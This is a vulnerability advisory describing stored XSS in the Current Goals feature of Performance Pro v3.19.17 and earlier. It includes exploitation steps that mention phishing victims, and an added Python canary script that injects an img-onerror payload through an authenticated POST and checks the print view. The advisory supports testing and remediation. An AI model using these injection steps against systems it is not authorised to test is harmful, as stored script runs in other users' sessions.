❗Stored XSS - Current Goals

Performance Pro v3.19.17 and earlier is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities (Persistent/Type II)

Stored XSS (authenticated)

Performance Pro v3.19.17 and earlier is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities (Persistent/Type II) via POST requests to:

Description

The application is vulnerable to multiple instances of stored (persistent) XSS in the Current Goals functionality. Input supplied by an authenticated user when creating or updating a goal is stored server-side and later written into the page without HTML output encoding or sanitization. Because the payload is persisted with the goal, it executes as arbitrary JavaScript in the session of any user who subsequently views or prints the affected goals, not only the user who entered it. The fix is context-appropriate output encoding at render time (in PHP, htmlspecialchars with ENT_QUOTES for values placed in HTML body or attribute contexts).

Affected Endpoints and Parameters:

Input (create/update goal): Vulnerable fields:

  • Goal Name

  • Goal Notes (name field)

  • Action Step Name

  • Notes Name

Rendered (stored payload executes) when viewing/printing goals: GET /viewgoals.php?printview=1&type=current Vulnerable fields:

  • Goal Name

  • Goal Description

  • Action Step Description


Exploitation

  • As an authenticated user, inject a JavaScript payload into any of the following Current Goals input fields and save the goal:

    • Goal Name

    • Goal Description

    • Action Steps Name

    • Action Steps Description

    • Note Name

  • The payload is stored server-side together with the goal. No crafted URL is required for it to fire, but the attacker can accelerate exploitation by sending the victim a link to the affected page (for example GET /viewgoals.php?printview=1&type=current) via phishing, social engineering, or any other attack vector.

  • When any user views or prints the goals, the application writes the stored input directly into the page without HTML encoding or sanitization.

  • The victim's browser renders the injected payload as part of the goals page, allowing arbitrary script execution in the victim's session.
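The following script is an added example for this advisory; it is not code from the advisory or from the Performance Pro product. It automates the procedure above as a repeatable check: it stores one unique, harmless canary per field through the goal-save POST, fetches the print view named in the advisory (GET /viewgoals.php?printview=1&type=current), and reports per field whether the canary came back unencoded (exploitable), entity-encoded or stripped (fixed), or absent. The base URL, session cookie, goal-save path and form field names are assumptions the tester supplies from an intercepted legitimate save request, since the advisory does not list them; the two HTML fragments in the block are constructed, not captured from the product.

```python
"""Stored-XSS canary check for the Current Goals print view.

Added example, not part of the advisory or the vendor's code. Only the
print-view path comes from the advisory; the save endpoint, form fields,
base URL and cookie are assumptions supplied by the tester.
"""
import html
import urllib.parse
import urllib.request
import uuid

# From the advisory: the page that renders stored goals without encoding.
PRINT_VIEW_PATH = "/viewgoals.php?printview=1&type=current"


def make_canary(field, nonce=None):
    """Return (payload, token) for one field.

    The token is unique per field, so when the payload fires (or is found in
    the response) you know which stored field rendered it. console.log is
    used instead of alert to keep the check harmless on a shared instance.
    """
    token = f"{field}-{nonce or uuid.uuid4().hex[:8]}"
    payload = f'<img src=x onerror="console.log(\'{token}\')">'
    return payload, token


def classify(body, payload, token):
    """How the print view rendered a stored canary.

    'unescaped' - the raw tag is in the HTML and will execute (vulnerable)
    'encoded'   - the token survived but the tag did not, i.e. the field was
                  HTML-entity-encoded or tag-stripped on output (fixed)
    'absent'    - the field is not rendered on this page at all
    """
    if payload in body:
        return "unescaped"
    if token in body:
        return "encoded"
    return "absent"


def check_print_view(base_url, cookie, save_path, canary_fields, extra_params=None, timeout=10):
    """Store a canary in every field named in canary_fields, then fetch the
    print view and classify each one.

    save_path / canary_fields / extra_params (CSRF token, goal id, ...) are
    assumptions: take them from an intercepted legitimate save request.
    """
    canaries = {f: make_canary(f) for f in canary_fields}
    form = dict(extra_params or {})
    form.update({f: canaries[f][0] for f in canary_fields})
    headers = {"Cookie": cookie}

    # Store the payloads (authenticated POST, as in the advisory).
    req = urllib.request.Request(
        base_url + save_path, data=urllib.parse.urlencode(form).encode(), headers=headers
    )
    urllib.request.urlopen(req, timeout=timeout).read()

    # Fetch the page that renders the stored values back.
    req = urllib.request.Request(base_url + PRINT_VIEW_PATH, headers=headers)
    body = urllib.request.urlopen(req, timeout=timeout).read().decode("utf-8", "replace")
    return {f: classify(body, *canaries[f]) for f in canary_fields}


# Offline illustration with constructed fragments (not captured output):
# the vulnerable rendering writes the stored value verbatim, the fixed one
# passes it through HTML entity encoding (htmlspecialchars(..., ENT_QUOTES)
# in PHP; html.escape here).
SAMPLE_PAYLOAD, SAMPLE_TOKEN = make_canary("goalname", nonce="c0ffee11")
VULNERABLE_FRAGMENT = f'<td class="goal-name">{SAMPLE_PAYLOAD}</td>'
FIXED_FRAGMENT = f'<td class="goal-name">{html.escape(SAMPLE_PAYLOAD)}</td>'

if __name__ == "__main__":
    for label, fragment in (("vulnerable", VULNERABLE_FRAGMENT), ("fixed", FIXED_FRAGMENT)):
        print(label, "->", classify(fragment, SAMPLE_PAYLOAD, SAMPLE_TOKEN))
    # Live check against a test instance (assumed values, adjust from an
    # intercepted request; the save endpoint is not named in the advisory):
    # print(check_print_view("https://target.example", "PHPSESSID=...",
    #                        "/<goal-save-endpoint>", ["goalname", "actionstepname"]))
```

Run the live check only against an instance you are authorised to test, and delete the canary goal afterwards; a result of `unescaped` for a field means any user opening the print view executes whatever that field contains.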

Example 1 - XSS in Updating/Creating Current Goals

  • Any of the highlighted fields are vulnerable to XSS during goal update/creation

  • Action Steps injection

  • Notes injection

  • Successful XSS exploitation

Example 2 - XSS in View/Print of Current Goals

  • Any of the highlighted fields are vulnerable to XSS on the View/Print page (GET /viewgoals.php?printview=1&type=current)

  • Successful XSS exploitation
